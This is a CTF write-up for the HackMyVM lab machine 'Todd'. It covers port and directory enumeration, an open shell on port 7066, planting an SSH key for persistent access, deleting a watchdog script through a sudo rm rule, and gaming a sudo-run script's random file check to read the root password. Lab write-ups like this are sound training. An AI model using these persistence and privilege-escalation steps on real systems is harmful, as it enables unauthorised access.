Synix's Gitbook

Todd

Writeup HackMyVM

Last updated 28 days ago

Yeah, after a long time I'm back, guys!! Hope y'all are doing great! Todd is an easy-difficulty Linux machine from the HackMyVM platform.

Enumeration

>> Find the IP address of our target on our virtual network with netdiscover

 Currently scanning: 192.168.6.0/16   |   Screen View: Unique Hosts

 7 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 420
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.9     28:a0:6b:44:be:d4      1      60  Intel Corporate
 192.168.1.15    08:00:27:88:e5:7f      1      60  PCS Systemtechnik GmbH
  • Our target IP is 192.168.1.15 (PCS Systemtechnik is the OUI used by VirtualBox virtual NICs, which the nmap MAC line below confirms).

>> Let's begin with an nmap scan

┌──(synix㉿0day)-[~]
└─$ sudo nmap -sC -sV -p- 192.168.1.15      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-26 12:24 IST
Nmap scan report for 192.168.1.15 (192.168.1.15)
Host is up (0.00012s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
80/tcp    open  http       Apache httpd 2.4.59 ((Debian))
|_http-title: Mindful Listening
|_http-server-header: Apache/2.4.59 (Debian)
1827/tcp  open  tcpwrapped
6192/tcp  open  tcpwrapped
7066/tcp  open  unknown
11379/tcp open  tcpwrapped
15758/tcp open  tcpwrapped
15924/tcp open  tcpwrapped
16778/tcp open  tcpwrapped
17828/tcp open  tcpwrapped
24072/tcp open  tcpwrapped
28343/tcp open  tcpwrapped
28976/tcp open  tcpwrapped
MAC Address: 08:00:27:88:E5:7F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.15 seconds

Port 7066 looks interesting: it is the only high port nmap did not flag as tcpwrapped (a port that completes the TCP handshake and then closes the connection without sending anything), so it may actually be talking to us.

Let's visit the webpage.

Just a static site!

>> Brute Force files and subdirectories with gobuster

┌──(synix㉿0day)-[~]
└─$ gobuster dir -u http://192.168.1.15 -w /home/synix/Downloads/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.15
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/synix/Downloads/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tools                (Status: 301) [Size: 312] [--> http://192.168.1.15/tools/]
/server-status        (Status: 403) [Size: 277]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

Let's visit http://192.168.1.15/tools/

Found some tools in /tools:

Index of /tools

Name          Last modified       Size
Parent Directory                  -
fscan         2024-02-25 03:32    6.0M
les.sh        2023-11-25 02:00    89K
linpeas.sh    2023-04-17 07:54    324K
pspy64        2023-04-17 07:58    3.0M

Apache/2.4.59 (Debian) Server at 192.168.1.15 Port 80

We may be able to use these later:

  • fscan: network and vulnerability scanner

  • les.sh: Linux Exploit Suggester, a kernel-exploit lookup script for privilege escalation

  • linpeas.sh: Linux Privilege Escalation Awesome Script

  • pspy64: monitor Linux processes without root permissions

Now back to the port

Let's try connecting to it with netcat:

┌──(synix㉿0day)-[~]
└─$ sudo nc 192.168.1.15 7066         
[sudo] password for synix: 
whoami
todd
id
uid=1000(todd) gid=1000(todd) groups=1000(todd)

But after some time it automatically disconnects.

Exploitation

Let's look around and see what we can find!

┌──(synix㉿0day)-[~/Downloads]
└─$ sudo nc 192.168.1.15 7066
cd /home/todd
dir
user.txt
cat user.txt
[*REDACTED*]

Yay! We got the user flag!

Stable Shell

We need a stable shell, so we'll plant an SSH public key for todd.

On the victim machine:

cd /home/todd 
mkdir .ssh

Now, on our attacker machine, generate an SSH key:

┌──(synix㉿0day)-[~]
└─$ ssh-keygen -t rsa -f attacker
Generating public/private rsa key pair.
Enter passphrase for "attacker" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in attacker
Your public key has been saved in attacker.pub
The key fingerprint is:
SHA256:Q7MjEkEjYWNShlenGJDqt6nSAJSq/SAhQPvbEHJHOm8 synix@0day
The key's randomart image is:
+---[RSA 3072]----+
|+*@+=..          |
|+Bo=o=           |
|=+.=o.  o        |
|* + =. . o       |
|=o o.E. S        |
|+.o.=. . o       |
| +.+o.           |
|. .o.            |
|...              |
+----[SHA256]-----+

Now add the contents of attacker.pub to authorized_keys on the victim machine. With sshd's default StrictModes, .ssh and authorized_keys must not be group- or world-writable; the default umask gives 755 and 644, which is accepted, but if the login is refused, run chmod 700 .ssh and chmod 600 .ssh/authorized_keys:

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkhsv9...hdsU64FEc= synix@0day" > .ssh/authorized_keys

Now log in:

┌──(synix㉿0day)-[~]
└─$ ssh todd@192.168.1.15 -i attacker
Enter passphrase for key 'attacker': 
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
todd
$ id
uid=1000(todd) gid=1000(todd) groups=1000(todd)

And we're in!

Privilege Escalation

Let's look around.

Connection to 192.168.1.15 closed by remote host.

The SSH session was closed again, with no input from us.

Let's check what sudo lets us run:

$ sudo -l
Matching Defaults entries for todd on todd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User todd may run the following commands on todd:
    (ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
    (ALL : ALL) NOPASSWD: /usr/bin/rm
    (ALL : ALL) NOPASSWD: /usr/sbin/reboot
$ bash
todd@todd:~$ cd /opt
todd@todd:/opt$ ls
create_nc2.sh  create_nc.sh  fake_ssh  kill_todd.sh
todd@todd:~$ Connection to 192.168.1.15 closed by remote host.
Connection to 192.168.1.15 closed.

We got disconnected again! That is caused by kill_todd.sh in /opt. We can't read it, but the sudo rule lets us run /usr/bin/rm as root with no password, so let's just remove it.

todd@todd:/opt$ cat kill_todd.sh 
cat: kill_todd.sh: Permission denied
todd@todd:/opt$ sudo /usr/bin/rm kill_todd.sh
todd@todd:/opt$ ls
create_nc2.sh  create_nc.sh  fake_ssh
todd@todd:/opt$ 

Now let's look at the script /srv/guess_and_check.sh, which the sudo rule also lets us run as root:

# check this script used by human 
a=$((RANDOM%1000))
echo "Please Input [$a]"

echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number

[[ $input_number -ne "$a" ]] && exit 1

sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"

[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2

Script logic:

  • Picks a random number between 0 and 999, stores it in a, prints it, and waits for input.

  • If the input doesn't match a, it exits with status 1. (The "human check" is no obstacle: the expected answer is printed right before the prompt.)

  • Then it builds two paths in /tmp/, true_file and false_file, each from a fresh random number between 0 and 999.

  • If true_file exists and false_file does NOT, it prints /root/.cred (the script runs as root through sudo, so it can read it); otherwise it exits with status 2.

Both names are drawn independently and only checked for existence, so there is no race window to hit: we pre-create some of the 1000 candidate names in /tmp and rerun the script until the draw lands on one of ours. We must not create all of them, though, since then false_file would always exist too and the script would always exit 2. With 250 of the 1000 names created, true_file exists 25% of the time and false_file is missing 75% of the time, which is roughly a 19% success chance per run (creating 500 names would raise that to the maximum of 25%). Note that touch creates the files in the current directory, so run the loop from /tmp:

cd /tmp && for i in {1..250}; do touch "$i"; done
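To check those odds without touching the target, here is an added bash example (my own, not part of the writeup or of the HackMyVM box) that re-implements only the file-existence check from the script above and measures how often it passes for different numbers of pre-created names. The mktemp directory standing in for /tmp, the function names and the trial counts are assumptions for the demo; the real script reads /root/.cred and looks in /tmp.

```bash
#!/usr/bin/env bash
# Added example, not the writeup's code: models the file-existence check from
# /srv/guess_and_check.sh locally so the odds of the pre-created-names trick can
# be measured. A mktemp directory stands in for /tmp and nothing is read from
# /root; the names and paths below are assumptions for the demo.

# Exact pass probability when `count` of the 1000 candidate names exist:
# P(true_file exists) * P(false_file missing) = (count/1000) * (1 - count/1000).
win_probability() {
    awk -v c="$1" 'BEGIN { p = c / 1000; printf "%.4f\n", p * (1 - p) }'
}

# Create empty files named 0..count-1 in $dir, like `touch` in /tmp.
seed_race_dir() {
    local dir=$1 count=$2 i
    for ((i = 0; i < count; i++)); do : > "$dir/$i"; done
}

# One run of the check with the target script's own logic (the sleeps and the
# "human" prompt are left out; the prompt prints the answer it expects anyway).
# Returns 0 where the script would cat the credential, 2 where it would exit 2.
race_check() {
    local dir=$1
    local true_file="$dir/$((RANDOM % 1000))"
    local false_file="$dir/$((RANDOM % 1000))"
    [[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && return 0
    return 2
}

# Run the check `trials` times against a directory seeded with `count` names and
# print "<wins> <rate>" for comparison with win_probability.
success_rate() {
    local count=$1 trials=$2 dir wins=0 i
    dir=$(mktemp -d)
    seed_race_dir "$dir" "$count"
    for ((i = 0; i < trials; i++)); do
        race_check "$dir" && wins=$((wins + 1))
    done
    rm -rf "$dir"
    awk -v w="$wins" -v t="$trials" 'BEGIN { printf "%d %.4f\n", w, w / t }'
}

# Wins only, for scripting around the result.
success_count() { success_rate "$1" "$2" | cut -d' ' -f1; }

if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
    # 250 names (the writeup's choice), 500 (the optimum) and 1000 (never passes).
    for n in 250 500 1000; do
        printf 'files=%-4s exact=%s observed(wins rate)=%s\n' \
            "$n" "$(win_probability "$n")" "$(success_rate "$n" 2000)"
    done
fi
```

Against the box the same arithmetic says to seed /tmp with touch /tmp/{0..499}, then rerun sudo /bin/bash /srv/guess_and_check.sh, answering the number it prints, and expect about four runs on average before the credential appears.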

Now run the script with sudo. The sudoers entry matches the exact command line /bin/bash /srv/guess_and_check.sh, so it has to be invoked that way. Below, the first run fails the file check (exit 2), the second fails because 468 was typed instead of 465 (exit 1), and the third prints the credential:

todd@todd:~$ sudo /bin/bash /srv/guess_and_check.sh 
Please Input [904]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>904
todd@todd:~$
todd@todd:~$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [465]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>468
todd@todd:~$
todd@todd:~$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [389]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>389
fake password

We've got the root creds!!

Let's switch to root.

todd@todd:~$ su root
Password: 
root@todd:/home/todd# whoami
root
root@todd:/home/todd# id
uid=0(root) gid=0(root) groups=0(root)
root@todd:/home/todd# cd /root/
root@todd:~# ls
root.txt
root@todd:~# cat root.txt 
Todd{*REDACTED*}
root@todd:~# 

And finally we have the root flag!! 🚨

📖 VM Link: Todd, https://hackmyvm.eu/achievement/?achievement=31188